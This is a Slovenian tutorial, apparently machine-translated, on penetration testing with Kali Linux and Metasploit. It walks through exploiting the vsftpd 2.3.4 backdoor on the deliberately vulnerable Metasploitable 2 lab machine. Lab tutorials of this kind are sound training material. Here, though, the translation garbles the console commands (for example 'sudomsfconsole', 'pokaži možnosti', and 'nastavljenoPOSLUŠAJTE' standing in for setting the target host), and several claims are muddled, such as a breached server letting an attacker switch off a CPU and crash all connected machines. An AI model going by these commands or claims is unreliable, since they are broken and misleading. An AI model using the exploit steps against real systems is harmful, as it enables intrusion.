Testiranje penetracije s Kali Linuxom
Internet je poln skrivalcev z zlonamernimi nameni, ki želijo dostopati do omrežij in izkoristiti svoje podatke, pri tem pa se izogniti odkrivanju. Varnost omrežja je smiselno zagotoviti le z merjenjem njihovih ranljivosti. Testiranje vdora ali etično vdiranje je način, na katerega testiramo omrežja ali strežnike za cilje, ki jih je mogoče doseči, tako da določimo vse možne kršitve, ki bi jih heker lahko uporabil za dostop, s čimer bi zmanjšali varnostne kompromise. Testiranje penetracije se pogosto izvaja s programskimi aplikacijami, med katerimi je najbolj priljubljen Kali Linux, po možnosti z ogrodjem Metasploit. Držite se do konca, če želite izvedeti, kako preizkusiti sistem z izvedbo napada z Kali Linux.
Uvod v okvir Kali Linux in Metasploit
Kali Linux je eno od mnogih naprednih sistemskih varnostnih orodij, ki jih je razvila (in redno posodabljala) Offensive Security. To je operacijski sistem, ki temelji na Linuxu in ima nabor orodij, namenjenih predvsem testiranju penetracije. Je dokaj enostaven za uporabo (vsaj v primerjavi z drugimi programi za testiranje peresa) in dovolj zapleten, da prikaže ustrezne rezultate.
The Okvir Metasploit je odprtokodna modularna platforma za testiranje penetracije, ki se uporablja za napad na sisteme za preizkušanje varnostnih podvigov. Je eno najpogosteje uporabljenih orodij za testiranje penetracije in je vgrajeno v Kali Linux.
Metasploit je sestavljen iz shrambe podatkov in modulov. Datastore omogoča uporabniku, da konfigurira vidike v okviru, moduli pa so samostojni odrezki kode, iz katerih Metasploit izhaja. Ker se osredotočamo na izvajanje napada za testiranje peresa, bomo razpravo obdržali na modulih.
Skupaj je pet modulov:
Izkoriščanje - se izogne odkrivanju, vdre v sistem in naloži modul tovora
Nosilnost - Omogoča uporabniku dostop do sistema
Pomožni –Podpira kršitve z opravljanjem nalog, ki niso povezane z izkoriščanjem
Objavi - Operacija - omogoča nadaljnji dostop do že ogroženega sistema
NOP generator - se uporablja za izogibanje varnostnim IP -jem
Za naše namene bomo z dostopom do našega ciljnega sistema uporabljali module Exploit in payload.
Nastavitev laboratorija za testiranje peresa
Potrebovali bomo naslednjo programsko opremo:
Kali Linux:
Kali Linux bo upravljal z našo lokalno strojno opremo. Za iskanje podvigov bomo uporabili njegov okvir Metasploit.
Hipervizor:
Potrebovali bomo hipervizor, saj nam omogoča ustvarjanje navidezni stroj , ki nam omogoča delo na več operacijskih sistemih hkrati. To je bistven predpogoj za testiranje penetracije. Za nemoteno plovbo in boljše rezultate priporočamo uporabo obeh Virtualbox ali Microsoft Hyper-V za ustvarjanje navideznega stroja .
Metasploitable 2
Ne smemo jih zamenjevati z Metasploitom, ki je okvir v Kali Linuxu, metasploitable je namerno ranljiv navidezni stroj, programiran za usposabljanje strokovnjakov za kibernetsko varnost. Metasploitable 2 ima na tone znanih ranljivosti, ki jih je mogoče preizkusiti, in na spletu je na voljo dovolj informacij, ki nam pomagajo pri začetku.
Čeprav je napad na virtualni sistem v programu Metasploitable 2 enostaven, ker so ranljivosti dobro dokumentirane, boste potrebovali veliko več znanja in potrpljenja z resničnimi stroji in omrežji, za katera boste sčasoma izvedli test penetracije. Toda uporaba metasploitable 2 za testiranje peresa je odlično izhodišče za spoznavanje metode.
Za nadaljnje testiranje peresa bomo uporabili metasploitable 2. Za delovanje tega navideznega stroja ne potrebujete veliko računalniškega pomnilnika, prostor na trdem disku 10 GB in 512mbs RAM -a bi moral biti v redu. Med namestitvijo ne pozabite spremeniti omrežnih nastavitev za Metasploitable na gostiteljski adapter. Ko je nameščen, zaženite Metasploitable in se prijavite. Zaženite Kali Linux, da lahko začnemo delovati njegov okvir Metasploit, da začnemo s preskušanjem.
Izkoriščanje VSFTPD v2.3.4 Backdoor Command Execution
Ko so vse stvari na svojem mestu, lahko končno iščemo ranljivost za izkoriščanje. V spletu lahko poiščete različne ranljivosti, vendar bomo v tej vadnici videli, kako lahko izkoristite VSFTPD v2.3.4. VSFTPD pomeni zelo varen demon FTP. To smo izbrali, ker nam omogoča popoln dostop do vmesnika Metasploitable, ne da bi za to potrebovali dovoljenje.
Zaženite konzolo Metasploit. Pojdite na ukazni poziv v Kali Linux in vnesite naslednjo kodo:
$sudomsfconsole 
Ko je konzola zdaj odprta, vnesite:
$iskanje vsftpd 
To prikaže lokacijo ranljivosti, ki jo želimo izkoristiti. Če ga želite izbrati, vnesite
$uporabite exploit/unix/ftp/vsftpd_234_backdoor 
Če želite videti, katere dodatne informacije so potrebne za zagon izkoriščanja, vnesite
$pokaži možnosti 
Edine manjkajoče pomembne informacije so IP, ki jih bomo posredovali.
Poiščite naslov IP v metasploatingu z vnosom
$ifconfig 
V ukazni lupini
Naslov IP je na začetku druge vrstice, nekaj takega
#inet addr: 10.0.2.15 
Vnesite ta ukaz za usmerjanje Metasploita v ciljni sistem in začnite z izkoriščanjem. Uporabljam svoj IP, vendar bo prišlo do napake, če pa uporabite drug IP žrtve, boste dobili rezultate od izkoriščanja
$nastavljenoPOSLUŠAJTE[IP žrtve] 
S popolnim dostopom do Metasploitable lahko po sistemu krmarimo brez omejitev. Lahko prenesete vse tajne podatke ali odstranite kar koli pomembnega s strežnika. V resničnih situacijah, ko blackhat pridobi dostop do takega strežnika, lahko celo izklopijo CPE, kar povzroči zrušitev tudi vseh drugih računalnikov, povezanih z njim.
Zaključevanje stvari
Bolje je, da težave odpravite vnaprej, namesto da se nanje odzovete. Testiranje penetracije vam lahko prihrani veliko težav in dohitevanja, ko gre za varnost vaših sistemov, pa naj bo to en sam računalniški stroj ali celotno omrežje. S tem v mislih je koristno imeti osnovno znanje o testiranju peresa. Metasploitable je odlično orodje za učenje osnovnih stvari, saj so njegove ranljivosti dobro znane, zato je o njem veliko informacij. S Kali Linuxom smo delali le na enem izkoriščanju, vendar vam toplo priporočamo, da jih podrobneje preučite.